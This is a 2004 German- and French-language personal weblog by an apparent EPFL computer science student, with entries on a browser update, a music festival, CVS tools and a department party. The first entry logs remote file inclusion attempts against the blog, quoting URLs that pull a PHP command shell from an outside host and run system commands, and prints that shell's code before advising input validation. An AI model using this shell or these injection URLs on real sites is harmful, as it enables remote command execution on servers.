16.05.2004
XSS
http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
Na, billige XSS-Attacke falsch angewendet.
In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.
</center><font size="2"><pre>-
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu Character type functions eingesetzt.
15:00 | Coding | Permalink
Dillo mit Tabs
Wie ich nach einem Update erfreut festgestellt habe, kann Dillo jetzt auch mit Tabs umgehen.
14:20 | Linux | Permalink
Balélec 2004
Le vendredi j'étais au Balélec et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.
On se voit l'année prochaine, au 25-ième Balélec!
12:36 | Music | Permalink
08.05.2004
Bouton Satellite
Là il y a 2170 boutons, mais aucun du Satellite. Donc j'ai crée moi-même un bouton pour le Satellite.
16:55 | Music | Permalink
CVS
Momentan machen wir im Programmieren ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, CVS einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.
Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: TkCVS und LinCVS, das auch auf Windows portiert wurde.
14:00 | Linux | Permalink
02.05.2004
Deadlock
Am Freitag feierte die
Section d'Informatique ihr 20-jähriges Bestehen.
Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der
EPFL überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.
Nachdem der offizielle Teil gebührend genossen war, gings ab zum
Deadlock. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der
UNIL (95% Frauenanteil) zusammengelegt :-)
So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...
01:32 | Misc | Permalink
